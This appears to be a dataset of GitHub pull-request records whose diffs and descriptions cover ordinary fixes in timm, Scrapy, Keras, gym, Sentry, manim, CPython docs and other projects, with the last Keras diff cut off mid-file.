title
stringlengths 2
169
| diff
stringlengths 235
19.5k
| body
stringlengths 0
30.5k
| url
stringlengths 48
84
| created_at
stringlengths 20
20
| closed_at
stringlengths 20
20
| merged_at
stringlengths 20
20
| updated_at
stringlengths 20
20
| diff_len
float64 101
3.99k
| repo_name
stringclasses 83
values | __index_level_0__
int64 15
52.7k
|
---|---|---|---|---|---|---|---|---|---|---|
Fix a few issues loading pretrained vit/bit npz weights... | diff --git a/README.md b/README.md
index 6b41d772d2..07c71a7664 100644
--- a/README.md
+++ b/README.md
@@ -23,6 +23,9 @@ I'm fortunate to be able to dedicate significant time and money of my own suppor
## What's New
+### June 23, 2021
+* Reproduce gMLP model training, `gmlp_s16_224` trained to 79.6 top-1, matching [paper](https://arxiv.org/abs/2105.08050).
+
### June 20, 2021
* Release Vision Transformer 'AugReg' weights from [How to train your ViT? Data, Augmentation, and Regularization in Vision Transformers](https://arxiv.org/abs/2106.10270)
* .npz weight loading support added, can load any of the 50K+ weights from the [AugReg series](https://console.cloud.google.com/storage/browser/vit_models/augreg)
diff --git a/tests/test_models.py b/tests/test_models.py
index 0a77078451..5c8b02dbe7 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -147,6 +147,15 @@ def test_model_default_cfgs(model_name, batch_size):
# FIXME mobilenetv3/ghostnet forward_features vs removed pooling differ
assert outputs.shape[-1] == pool_size[-1] and outputs.shape[-2] == pool_size[-2]
+ if 'pruned' not in model_name: # FIXME better pruned model handling
+ # test classifier + global pool deletion via __init__
+ model = create_model(model_name, pretrained=False, num_classes=0, global_pool='').eval()
+ outputs = model.forward(input_tensor)
+ assert len(outputs.shape) == 4
+ if not isinstance(model, timm.models.MobileNetV3) and not isinstance(model, timm.models.GhostNet):
+ # FIXME mobilenetv3/ghostnet forward_features vs removed pooling differ
+ assert outputs.shape[-1] == pool_size[-1] and outputs.shape[-2] == pool_size[-2]
+
# check classifier name matches default_cfg
classifier = cfg['classifier']
if not isinstance(classifier, (tuple, list)):
@@ -193,6 +202,13 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
assert len(outputs.shape) == 2
assert outputs.shape[1] == model.num_features
+ model = create_model(model_name, pretrained=False, num_classes=0).eval()
+ outputs = model.forward(input_tensor)
+ if isinstance(outputs, tuple):
+ outputs = outputs[0]
+ assert len(outputs.shape) == 2
+ assert outputs.shape[1] == model.num_features
+
# check classifier name matches default_cfg
classifier = cfg['classifier']
if not isinstance(classifier, (tuple, list)):
@@ -217,6 +233,7 @@ def test_model_load_pretrained(model_name, batch_size):
"""Create that pretrained weights load, verify support for in_chans != 3 while doing so."""
in_chans = 3 if 'pruned' in model_name else 1 # pruning not currently supported with in_chans change
create_model(model_name, pretrained=True, in_chans=in_chans, num_classes=5)
+ create_model(model_name, pretrained=True, in_chans=in_chans, num_classes=0)
@pytest.mark.timeout(120)
@pytest.mark.parametrize('model_name', list_models(pretrained=True, exclude_filters=NON_STD_FILTERS))
diff --git a/timm/models/ghostnet.py b/timm/models/ghostnet.py
index a73047c5d8..3b6f90a42f 100644
--- a/timm/models/ghostnet.py
+++ b/timm/models/ghostnet.py
@@ -182,7 +182,7 @@ def __init__(self, cfgs, num_classes=1000, width=1.0, dropout=0.2, in_chans=3, o
self.conv_head = nn.Conv2d(prev_chs, out_chs, 1, 1, 0, bias=True)
self.act2 = nn.ReLU(inplace=True)
self.flatten = nn.Flatten(1) if global_pool else nn.Identity() # don't flatten if pooling disabled
- self.classifier = Linear(out_chs, num_classes)
+ self.classifier = Linear(out_chs, num_classes) if num_classes > 0 else nn.Identity()
def get_classifier(self):
return self.classifier
diff --git a/timm/models/levit.py b/timm/models/levit.py
index fa35f41f18..9987e4ba98 100644
--- a/timm/models/levit.py
+++ b/timm/models/levit.py
@@ -542,7 +542,7 @@ def checkpoint_filter_fn(state_dict, model):
state_dict = state_dict['model']
D = model.state_dict()
for k in state_dict.keys():
- if D[k].ndim == 4 and state_dict[k].ndim == 2:
+ if k in D and D[k].ndim == 4 and state_dict[k].ndim == 2:
state_dict[k] = state_dict[k][:, :, None, None]
return state_dict
diff --git a/timm/models/mlp_mixer.py b/timm/models/mlp_mixer.py
index 7a87eb36a0..f128b9c916 100644
--- a/timm/models/mlp_mixer.py
+++ b/timm/models/mlp_mixer.py
@@ -129,7 +129,9 @@ def _cfg(url='', **kwargs):
mean=IMAGENET_DEFAULT_MEAN, std=IMAGENET_DEFAULT_STD),
gmlp_ti16_224=_cfg(),
- gmlp_s16_224=_cfg(),
+ gmlp_s16_224=_cfg(
+ url='https://github.com/rwightman/pytorch-image-models/releases/download/v0.1-weights/gmlp_s16_224_raa-10536d42.pth',
+ ),
gmlp_b16_224=_cfg(),
)
@@ -266,7 +268,7 @@ def __init__(
act_layer=act_layer, drop=drop_rate, drop_path=drop_path_rate)
for _ in range(num_blocks)])
self.norm = norm_layer(embed_dim)
- self.head = nn.Linear(embed_dim, self.num_classes) # zero init
+ self.head = nn.Linear(embed_dim, self.num_classes) if num_classes > 0 else nn.Identity()
self.init_weights(nlhb=nlhb)
diff --git a/timm/models/resnetv2.py b/timm/models/resnetv2.py
index a3c8953213..b96d77428f 100644
--- a/timm/models/resnetv2.py
+++ b/timm/models/resnetv2.py
@@ -424,7 +424,8 @@ def t2p(conv_weights):
model.stem.conv.weight.copy_(stem_conv_w)
model.norm.weight.copy_(t2p(weights[f'{prefix}group_norm/gamma']))
model.norm.bias.copy_(t2p(weights[f'{prefix}group_norm/beta']))
- if model.head.fc.weight.shape[0] == weights[f'{prefix}head/conv2d/kernel'].shape[-1]:
+ if isinstance(getattr(model.head, 'fc', None), nn.Conv2d) and \
+ model.head.fc.weight.shape[0] == weights[f'{prefix}head/conv2d/kernel'].shape[-1]:
model.head.fc.weight.copy_(t2p(weights[f'{prefix}head/conv2d/kernel']))
model.head.fc.bias.copy_(t2p(weights[f'{prefix}head/conv2d/bias']))
for i, (sname, stage) in enumerate(model.stages.named_children()):
diff --git a/timm/models/visformer.py b/timm/models/visformer.py
index 1663102735..7740f38132 100644
--- a/timm/models/visformer.py
+++ b/timm/models/visformer.py
@@ -237,7 +237,6 @@ def __init__(self, img_size=224, patch_size=16, in_chans=3, num_classes=1000, in
self.num_features = embed_dim if self.vit_stem else embed_dim * 2
self.norm = norm_layer(self.num_features)
self.global_pool, self.head = create_classifier(self.num_features, self.num_classes, pool_type=global_pool)
- self.head = nn.Linear(self.num_features, num_classes)
# weights init
if self.pos_embed:
diff --git a/timm/models/vision_transformer.py b/timm/models/vision_transformer.py
index 89fba7de69..9ec45868b2 100644
--- a/timm/models/vision_transformer.py
+++ b/timm/models/vision_transformer.py
@@ -6,7 +6,7 @@
- https://arxiv.org/abs/2010.11929
`How to train your ViT? Data, Augmentation, and Regularization in Vision Transformers`
- - https://arxiv.org/abs/2106.TODO
+ - https://arxiv.org/abs/2106.10270
The official jax code is released and available at https://github.com/google-research/vision_transformer
@@ -448,9 +448,12 @@ def _n2p(w, t=True):
model.pos_embed.copy_(pos_embed_w)
model.norm.weight.copy_(_n2p(w[f'{prefix}Transformer/encoder_norm/scale']))
model.norm.bias.copy_(_n2p(w[f'{prefix}Transformer/encoder_norm/bias']))
- if model.head.bias.shape[0] == w[f'{prefix}head/bias'].shape[-1]:
+ if isinstance(model.head, nn.Linear) and model.head.bias.shape[0] == w[f'{prefix}head/bias'].shape[-1]:
model.head.weight.copy_(_n2p(w[f'{prefix}head/kernel']))
model.head.bias.copy_(_n2p(w[f'{prefix}head/bias']))
+ if isinstance(getattr(model.pre_logits, 'fc', None), nn.Linear) and f'{prefix}pre_logits/bias' in w:
+ model.pre_logits.fc.weight.copy_(_n2p(w[f'{prefix}pre_logits/kernel']))
+ model.pre_logits.fc.bias.copy_(_n2p(w[f'{prefix}pre_logits/bias']))
for i, block in enumerate(model.blocks.children()):
block_prefix = f'{prefix}Transformer/encoderblock_{i}/'
mha_prefix = block_prefix + 'MultiHeadDotProductAttention_1/'
@@ -673,6 +676,7 @@ def vit_large_patch16_384(pretrained=False, **kwargs):
def vit_tiny_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Tiny (Vit-Ti/16).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(patch_size=16, embed_dim=192, depth=12, num_heads=3, **kwargs)
model = _create_vision_transformer('vit_tiny_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
@@ -683,6 +687,7 @@ def vit_tiny_patch16_224_in21k(pretrained=False, **kwargs):
def vit_small_patch32_224_in21k(pretrained=False, **kwargs):
""" ViT-Small (ViT-S/16)
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(patch_size=32, embed_dim=384, depth=12, num_heads=6, **kwargs)
model = _create_vision_transformer('vit_small_patch32_224_in21k', pretrained=pretrained, **model_kwargs)
@@ -693,6 +698,7 @@ def vit_small_patch32_224_in21k(pretrained=False, **kwargs):
def vit_small_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Small (ViT-S/16)
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(patch_size=16, embed_dim=384, depth=12, num_heads=6, **kwargs)
model = _create_vision_transformer('vit_small_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
@@ -703,9 +709,10 @@ def vit_small_patch16_224_in21k(pretrained=False, **kwargs):
def vit_base_patch32_224_in21k(pretrained=False, **kwargs):
""" ViT-Base model (ViT-B/32) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(
- patch_size=32, embed_dim=768, depth=12, num_heads=12, representation_size=768, **kwargs)
+ patch_size=32, embed_dim=768, depth=12, num_heads=12, **kwargs)
model = _create_vision_transformer('vit_base_patch32_224_in21k', pretrained=pretrained, **model_kwargs)
return model
@@ -714,9 +721,10 @@ def vit_base_patch32_224_in21k(pretrained=False, **kwargs):
def vit_base_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Base model (ViT-B/16) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(
- patch_size=16, embed_dim=768, depth=12, num_heads=12, representation_size=768, **kwargs)
+ patch_size=16, embed_dim=768, depth=12, num_heads=12, **kwargs)
model = _create_vision_transformer('vit_base_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
return model
@@ -725,6 +733,7 @@ def vit_base_patch16_224_in21k(pretrained=False, **kwargs):
def vit_large_patch32_224_in21k(pretrained=False, **kwargs):
""" ViT-Large model (ViT-L/32) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has a representation layer but the 21k classifier head is zero'd out in original weights
"""
model_kwargs = dict(
patch_size=32, embed_dim=1024, depth=24, num_heads=16, representation_size=1024, **kwargs)
@@ -736,9 +745,10 @@ def vit_large_patch32_224_in21k(pretrained=False, **kwargs):
def vit_large_patch16_224_in21k(pretrained=False, **kwargs):
""" ViT-Large model (ViT-L/16) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
+ NOTE: this model has valid 21k classifier head and no representation (pre-logits) layer
"""
model_kwargs = dict(
- patch_size=16, embed_dim=1024, depth=24, num_heads=16, representation_size=1024, **kwargs)
+ patch_size=16, embed_dim=1024, depth=24, num_heads=16, **kwargs)
model = _create_vision_transformer('vit_large_patch16_224_in21k', pretrained=pretrained, **model_kwargs)
return model
@@ -747,7 +757,7 @@ def vit_large_patch16_224_in21k(pretrained=False, **kwargs):
def vit_huge_patch14_224_in21k(pretrained=False, **kwargs):
""" ViT-Huge model (ViT-H/14) from original paper (https://arxiv.org/abs/2010.11929).
ImageNet-21k weights @ 224x224, source https://github.com/google-research/vision_transformer.
- NOTE: converted weights not currently available, too large for github release hosting.
+ NOTE: this model has a representation layer but the 21k classifier head is zero'd out in original weights
"""
model_kwargs = dict(
patch_size=14, embed_dim=1280, depth=32, num_heads=16, representation_size=1280, **kwargs)
| w/ num_classes=0 __init__ arg. Missed a few other small classifier handling detail on Mlp, GhostNet, Levit. Should fix #713 | https://api.github.com/repos/huggingface/pytorch-image-models/pulls/714 | 2021-06-23T06:18:02Z | 2021-06-23T18:36:55Z | 2021-06-23T18:36:55Z | 2021-06-23T18:36:55Z | 3,900 | huggingface/pytorch-image-models | 16,412 |
[MRG+1] Added from_crawler to middleware docs | diff --git a/docs/topics/downloader-middleware.rst b/docs/topics/downloader-middleware.rst
index 0d168017f28..983a932904d 100644
--- a/docs/topics/downloader-middleware.rst
+++ b/docs/topics/downloader-middleware.rst
@@ -157,6 +157,17 @@ more of the following methods:
:param spider: the spider for which this request is intended
:type spider: :class:`~scrapy.spiders.Spider` object
+ .. method:: from_crawler(cls, crawler)
+
+ If present, this classmethod is called to create a middleware instance
+ from a :class:`~scrapy.crawler.Crawler`. It must return a new instance
+ of the middleware. Crawler object provides access to all Scrapy core
+ components like settings and signals; it is a way for middleware to
+ access them and hook its functionality into Scrapy.
+
+ :param crawler: crawler that uses this middleware
+ :type crawler: :class:`~scrapy.crawler.Crawler` object
+
.. _topics-downloader-middleware-ref:
Built-in downloader middleware reference
diff --git a/docs/topics/spider-middleware.rst b/docs/topics/spider-middleware.rst
index a2d2556c561..c297ed556ff 100644
--- a/docs/topics/spider-middleware.rst
+++ b/docs/topics/spider-middleware.rst
@@ -164,6 +164,17 @@ following methods:
:param spider: the spider to whom the start requests belong
:type spider: :class:`~scrapy.spiders.Spider` object
+ .. method:: from_crawler(cls, crawler)
+
+ If present, this classmethod is called to create a middleware instance
+ from a :class:`~scrapy.crawler.Crawler`. It must return a new instance
+ of the middleware. Crawler object provides access to all Scrapy core
+ components like settings and signals; it is a way for middleware to
+ access them and hook its functionality into Scrapy.
+
+ :param crawler: crawler that uses this middleware
+ :type crawler: :class:`~scrapy.crawler.Crawler` object
+
.. _Exception: https://docs.python.org/2/library/exceptions.html#exceptions.Exception
| Fixing issue #3019 by adding the `from_crawler` classmethod to the documentation of middlewares to make this feature more visible. | https://api.github.com/repos/scrapy/scrapy/pulls/3020 | 2017-11-23T14:29:05Z | 2017-11-24T14:56:58Z | 2017-11-24T14:56:58Z | 2017-12-22T00:23:07Z | 510 | scrapy/scrapy | 34,891 |
Travis CI PyPy 3 issue checking | diff --git a/.travis.yml b/.travis.yml
index fec820cf6b8..58e78e6692f 100644
--- a/.travis.yml
+++ b/.travis.yml
@@ -24,6 +24,14 @@ matrix:
- env: TOXENV=docs
python: 3.6
install:
+ # For some reason the same PyPy3 version straight from Travis CI causes a
+ # test failure, so we install it manually here
+ - |
+ export PYPY_VERSION="pypy3.6-7.1.1-beta-linux_x86_64-portable"
+ wget "https://bitbucket.org/squeaky/portable-pypy/downloads/${PYPY_VERSION}.tar.bz2"
+ tar -jxf ${PYPY_VERSION}.tar.bz2
+ virtualenv --python="$PYPY_VERSION/bin/pypy3" "$HOME/virtualenvs/$PYPY_VERSION"
+ source "$HOME/virtualenvs/$PYPY_VERSION/bin/activate"
- pip install -U tox twine wheel codecov
script: tox
| https://api.github.com/repos/scrapy/scrapy/pulls/4129 | 2019-11-05T17:40:41Z | 2019-11-05T18:34:21Z | 2019-11-05T18:34:21Z | 2019-11-05T18:34:22Z | 250 | scrapy/scrapy | 34,705 |
|
Update setup.py | diff --git a/setup.py b/setup.py
index d2d708ceaf7..835cb60cb37 100644
--- a/setup.py
+++ b/setup.py
@@ -32,7 +32,7 @@
zip_safe=False,
install_requires=[
'scipy', 'numpy>=1.10.4', 'six', 'pyglet>=1.2.0,<=1.3.2', 'cloudpickle~=1.2.0',
- 'enum34~=1.1.6;python_version<"3.4"'
+ 'enum34~=1.1.6;python_version<"3.4"', 'opencv-python'
],
extras_require=extras,
package_data={'gym': [
| Just added opencv-python to be installed as a requirement. The new atari_preprocessing.py wrapper needs it. | https://api.github.com/repos/openai/gym/pulls/1713 | 2019-10-18T19:24:28Z | 2019-10-18T21:41:10Z | 2019-10-18T21:41:10Z | 2019-12-20T13:53:31Z | 161 | openai/gym | 5,614 |
ref(prism): Auto-download language dependencies | diff --git a/static/app/utils/loadPrismLanguage.ts b/static/app/utils/loadPrismLanguage.ts
index 1f2d0e74a950d..68958dc4dca78 100644
--- a/static/app/utils/loadPrismLanguage.ts
+++ b/static/app/utils/loadPrismLanguage.ts
@@ -40,7 +40,7 @@ export async function loadPrismLanguage(
}
) {
try {
- const language = prismLanguageMap[lang.toLowerCase()];
+ const language: string | undefined = prismLanguageMap[lang.toLowerCase()];
// If Prism doesn't have any grammar file available for the language
if (!language) {
@@ -54,7 +54,16 @@ export async function loadPrismLanguage(
return;
}
+ // Check for dependencies (e.g. `php` requires `markup-templating`) & download them
+ const deps: string[] | string | undefined =
+ prismComponents.languages[language].require;
+ (Array.isArray(deps) ? deps : [deps]).forEach(
+ async dep => dep && (await import(`prismjs/components/prism-${dep}.min`))
+ );
+
+ // Download language grammar file
await import(`prismjs/components/prism-${language}.min`);
+
onLoad?.();
} catch (error) {
// eslint-disable-next-line no-console
| Automatically detect and download Prism language dependencies (some languages will not load correctly without them, e.g. [`php` requires `markup-templating`](https://github.com/PrismJS/prism/issues/1400)).
**Before ——**
![image](https://user-images.githubusercontent.com/44172267/229880541-9436a9fd-520b-43f8-b284-08db9971ea1d.png)
![image](https://user-images.githubusercontent.com/44172267/229880582-6ab702ea-80c6-4ebc-ac4f-6637e7be5153.png)
**After ——**
![image](https://user-images.githubusercontent.com/44172267/229880475-aa604e16-1bef-4c78-9742-6c3fdf48536f.png)
| https://api.github.com/repos/getsentry/sentry/pulls/46887 | 2023-04-04T18:09:35Z | 2023-04-04T20:01:46Z | 2023-04-04T20:01:46Z | 2023-04-20T00:02:15Z | 301 | getsentry/sentry | 44,604 |
Fix: step by step API key generation | diff --git a/Troubleshooting.md b/Troubleshooting.md
index 3891db3a..89aa3ba7 100644
--- a/Troubleshooting.md
+++ b/Troubleshooting.md
@@ -11,7 +11,8 @@ You don't need a ChatGPT Pro account. Screenshot to code uses API keys from your
5. Go to Settings > Limits and check at the bottom of the page, your current tier has to be "Tier 1" to have GPT4 access
<img width="900" alt="285636973-da38bd4d-8a78-4904-8027-ca67d729b933" src="https://github.com/abi/screenshot-to-code/assets/23818/8d07cd84-0cf9-4f88-bc00-80eba492eadf">
-6. Go to Screenshot to code and paste it in the Settings dialog under OpenAI key (gear icon). Your key is only stored in your browser. Never stored on our servers.
+6. Navigate to OpenAI [api keys](https://platform.openai.com/api-keys) page and create and copy a new secret key.
+7. Go to Screenshot to code and paste it in the Settings dialog under OpenAI key (gear icon). Your key is only stored in your browser. Never stored on our servers.
## Still not working?
| Fix step by step adding a reference to the specific page in which open ai API keys are generated | https://api.github.com/repos/abi/screenshot-to-code/pulls/304 | 2024-04-12T03:48:52Z | 2024-04-12T14:22:06Z | 2024-04-12T14:22:06Z | 2024-04-12T14:22:06Z | 305 | abi/screenshot-to-code | 46,891 |
[3.11] Docs: normalize SQL style in sqlite3 docs (GH-96403) | diff --git a/Doc/library/sqlite3.rst b/Doc/library/sqlite3.rst
index 50499b001e2805..21ad3540ccbb77 100644
--- a/Doc/library/sqlite3.rst
+++ b/Doc/library/sqlite3.rst
@@ -384,7 +384,7 @@ Module functions
... print(f"Error message: {unraisable.err_msg}")
>>> import sys
>>> sys.unraisablehook = debug
- >>> cur = con.execute("select 1")
+ >>> cur = con.execute("SELECT 1")
ZeroDivisionError('division by zero') in callback evil_trace
Error message: None
@@ -1206,7 +1206,7 @@ Cursor objects
("row2",),
]
# cur is an sqlite3.Cursor object
- cur.executemany("insert into data values(?)", rows)
+ cur.executemany("INSERT INTO data VALUES(?)", rows)
.. method:: executescript(sql_script, /)
@@ -1224,11 +1224,11 @@ Cursor objects
# cur is an sqlite3.Cursor object
cur.executescript("""
- begin;
- create table person(firstname, lastname, age);
- create table book(title, author, published);
- create table publisher(name, address);
- commit;
+ BEGIN;
+ CREATE TABLE person(firstname, lastname, age);
+ CREATE TABLE book(title, author, published);
+ CREATE TABLE publisher(name, address);
+ COMMIT;
""")
| (cherry picked from commit 6d403e264a7dcd1544a91708f139c6dd8612204d)
Co-authored-by: Erlend E. Aasland <erlend.aasland@protonmail.com> | https://api.github.com/repos/python/cpython/pulls/96404 | 2022-08-29T22:50:49Z | 2022-08-29T22:59:13Z | 2022-08-29T22:59:13Z | 2022-08-29T23:25:27Z | 349 | python/cpython | 4,661 |
Working version of ProbabilityDistributions scene, though I'm still u… | diff --git a/active_projects/eop/chapter1/prob_dist_visuals.py b/active_projects/eop/chapter1/prob_dist_visuals.py
index 513c94c204..b8b336c966 100644
--- a/active_projects/eop/chapter1/prob_dist_visuals.py
+++ b/active_projects/eop/chapter1/prob_dist_visuals.py
@@ -193,6 +193,7 @@ def construct(self):
# FadeIn(dice_unit_rect),
# FadeIn(dice_table.rows)
# )
+ # self.add(dice_unit_rect, dice_table_rows)
for (cell, label) in zip(dice_table.cells, dice_table.labels):
cell.add(label)
@@ -201,11 +202,10 @@ def construct(self):
# LaggedStart(FadeIn, dice_table_grouped_cells,
# lag_ratio = lag_ratio, run_time = run_time)
# )
- self.play(
- FadeIn(dice_table_grouped_cells),
- FadeIn(dice_unit_rect),
- FadeIn(dice_table.rows)
- )
+
+ self.remove(dice_table) # Remove the table
+ self.add(dice_table_grouped_cells) # Add in the reorganized version
+
self.wait(3)
@@ -226,6 +226,21 @@ def construct(self):
FadeOut(dice_table.rows),
FadeOut(dice_unit_rect),
)
+
+
+ # Animating the dice_table_group (which is what you had been
+ # manipulating above), instead of the dice_table, seems to work.
+ # I suspect there was something going on with the subgroup structures
+ # getting convoluted.
+ self.play(
+ dice_table_grouped_cells.scale, 0.5,
+ dice_table_grouped_cells.to_corner, UR,
+ )
+ # dice_table_target = dice_table.copy()
+ # dice_table_target.scale(0.5).to_corner(UR, buff = MED_LARGE_BUFF)
+
+ # self.play(Transform(dice_table, dice_table_target))
+
self.wait(3)
| …nsure what the underlying bug was | https://api.github.com/repos/3b1b/manim/pulls/234 | 2018-05-11T18:33:42Z | 2018-09-11T18:45:15Z | 2018-09-11T18:45:15Z | 2019-02-03T20:24:14Z | 473 | 3b1b/manim | 18,505 |
Fill keys in CSVLogger before stop_training is checked | diff --git a/keras/callbacks.py b/keras/callbacks.py
index d86c26ce0f2..55d640e2a84 100644
--- a/keras/callbacks.py
+++ b/keras/callbacks.py
@@ -965,13 +965,14 @@ def handle_value(k):
else:
return k
+ if self.keys is None:
+ self.keys = sorted(logs.keys())
+
if self.model.stop_training:
# We set NA so that csv parsers do not fail for this last epoch.
logs = dict([(k, logs[k]) if k in logs else (k, 'NA') for k in self.keys])
if not self.writer:
- self.keys = sorted(logs.keys())
-
class CustomDialect(csv.excel):
delimiter = self.sep
| Fixes #8797. | https://api.github.com/repos/keras-team/keras/pulls/8801 | 2017-12-15T12:15:50Z | 2017-12-15T19:00:20Z | 2017-12-15T19:00:20Z | 2017-12-15T19:00:20Z | 183 | keras-team/keras | 47,736 |
[RELNOTES] Add `target_tensors` to `compile`. | diff --git a/keras/engine/training.py b/keras/engine/training.py
index 80ade166499..3b517810e08 100644
--- a/keras/engine/training.py
+++ b/keras/engine/training.py
@@ -52,6 +52,10 @@ def _standardize_input_data(data, names, shapes=None,
ValueError: in case of improperly formatted user-provided data.
"""
if not names:
+ if data:
+ raise ValueError('Error when checking model ' +
+ exception_prefix + ': '
+ 'expected no data, but got:', data)
return []
if data is None:
return [None for _ in range(len(names))]
@@ -564,7 +568,8 @@ class Model(Container):
"""
def compile(self, optimizer, loss, metrics=None, loss_weights=None,
- sample_weight_mode=None, weighted_metrics=None, **kwargs):
+ sample_weight_mode=None, weighted_metrics=None,
+ target_tensors=None, **kwargs):
"""Configures the model for training.
# Arguments
@@ -597,6 +602,14 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
If the model has multiple outputs, you can use a different
`sample_weight_mode` on each output by passing a
dictionary or a list of modes.
+ target_tensors: by default, Keras will create placeholders for the
+ model's target, which will be fed with the target data during
+ training. If instead you would like to use your own
+ target tensors (in turn, Keras will not expect external
+ Numpy data for these targets at training time), you
+ can specify them via the `target_tensors` argument. It can be
+ a single tensor (for a single-output model), a list of tensors,
+ or a dict mapping output names to target tensors.
weighted_metrics: list of metrics to be evaluated and weighted
by sample_weight or class_weight during training and testing
**kwargs: when using the Theano/CNTK backends, these arguments
@@ -644,19 +657,16 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
loss_functions = [loss_function for _ in range(len(self.outputs))]
self.loss_functions = loss_functions
weighted_losses = [_weighted_masked_objective(fn) for fn in loss_functions]
- skip_indices = []
+ skip_target_indices = []
+ skip_target_weighing_indices = []
self._feed_outputs = []
self._feed_output_names = []
self._feed_output_shapes = []
self._feed_loss_fns = []
for i in range(len(weighted_losses)):
if weighted_losses[i] is None:
- skip_indices.append(i)
- else:
- self._feed_outputs.append(self.outputs[i])
- self._feed_output_names.append(self.output_names[i])
- self._feed_output_shapes.append(self.internal_output_shapes[i])
- self._feed_loss_fns.append(self.loss_functions[i])
+ skip_target_indices.append(i)
+ skip_target_weighing_indices.append(i)
# Prepare output masks.
masks = self.compute_mask(self.inputs, mask=None)
@@ -691,6 +701,56 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
str(loss_weights) +
' - expected a list of dicts.')
+ # Prepare targets of model.
+ self.targets = []
+ self._feed_targets = []
+ if target_tensors is not None:
+ if isinstance(target_tensors, list):
+ if len(target_tensors) != len(self.outputs):
+ raise ValueError(
+ 'When passing a list as `target_tensors`, '
+ 'it should have one entry per model outputs. '
+ 'The model has ' + str(len(self.outputs)) +
+ ' outputs, but you passed target_tensors=' +
+ str(target_tensors))
+ elif isinstance(target_tensors, dict):
+ for name in target_tensors:
+ if name not in self.output_names:
+ raise ValueError('Unknown entry in `target_tensors` '
+ 'dictionary: "' + name + '". '
+ 'Only expected the following keys: ' +
+ str(self.output_names))
+ _target_tensors = []
+ for name in self.output_names:
+ _target_tensors.append(target_tensors.get(name, None))
+ target_tensors = _target_tensors
+ else:
+ raise TypeError('Expected `target_tensors` to be '
+ 'a list or dict, but got:', target_tensors)
+ for i in range(len(self.outputs)):
+ if i in skip_target_indices:
+ self.targets.append(None)
+ else:
+ shape = self.internal_output_shapes[i]
+ name = self.output_names[i]
+ if target_tensors is not None:
+ target = target_tensors[i]
+ else:
+ target = None
+ if target is None:
+ target = K.placeholder(ndim=len(shape),
+ name=name + '_target',
+ sparse=K.is_sparse(self.outputs[i]),
+ dtype=K.dtype(self.outputs[i]))
+ self._feed_targets.append(target)
+ self._feed_outputs.append(self.outputs[i])
+ self._feed_output_names.append(name)
+ self._feed_output_shapes.append(shape)
+ self._feed_loss_fns.append(self.loss_functions[i])
+ else:
+ skip_target_weighing_indices.append(i)
+ self.targets.append(target)
+
# Prepare sample weights.
sample_weights = []
sample_weight_modes = []
@@ -703,7 +763,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
'Only expected the following keys: ' +
str(self.output_names))
for i, name in enumerate(self.output_names):
- if i in skip_indices:
+ if i in skip_target_weighing_indices:
weight = None
sample_weight_modes.append(None)
else:
@@ -729,7 +789,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
'sample_weight_mode=' +
str(sample_weight_mode))
for i in range(len(self.output_names)):
- if i in skip_indices:
+ if i in skip_target_weighing_indices:
weight = None
sample_weight_modes.append(None)
else:
@@ -746,7 +806,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
sample_weights.append(weight)
else:
for i, name in enumerate(self.output_names):
- if i in skip_indices:
+ if i in skip_target_weighing_indices:
sample_weight_modes.append(None)
sample_weights.append(None)
else:
@@ -763,25 +823,9 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
self.sample_weight_modes = sample_weight_modes
self._feed_sample_weight_modes = []
for i in range(len(self.outputs)):
- if i not in skip_indices:
+ if i not in skip_target_weighing_indices:
self._feed_sample_weight_modes.append(self.sample_weight_modes[i])
- # Prepare targets of model.
- self.targets = []
- self._feed_targets = []
- for i in range(len(self.outputs)):
- if i in skip_indices:
- self.targets.append(None)
- else:
- shape = self.internal_output_shapes[i]
- name = self.output_names[i]
- target = K.placeholder(ndim=len(shape),
- name=name + '_target',
- sparse=K.is_sparse(self.outputs[i]),
- dtype=K.dtype(self.outputs[i]))
- self.targets.append(target)
- self._feed_targets.append(target)
-
# Prepare metrics.
self.metrics = metrics
self.weighted_metrics = weighted_metrics
@@ -792,7 +836,7 @@ def compile(self, optimizer, loss, metrics=None, loss_weights=None,
total_loss = None
with K.name_scope('loss'):
for i in range(len(self.outputs)):
- if i in skip_indices:
+ if i in skip_target_indices:
continue
y_true = self.targets[i]
y_pred = self.outputs[i]
@@ -836,7 +880,7 @@ def append_metric(layer_index, metric_name, metric_tensor):
with K.name_scope('metrics'):
for i in range(len(self.outputs)):
- if i in skip_indices:
+ if i in skip_target_indices:
continue
y_true = self.targets[i]
@@ -884,7 +928,7 @@ def handle_metrics(metrics, weights=None):
self.sample_weights = sample_weights
self._feed_sample_weights = []
for i in range(len(self.sample_weights)):
- if i not in skip_indices:
+ if i not in skip_target_weighing_indices:
self._feed_sample_weights.append(sample_weights[i])
# Functions for train, test and predict will
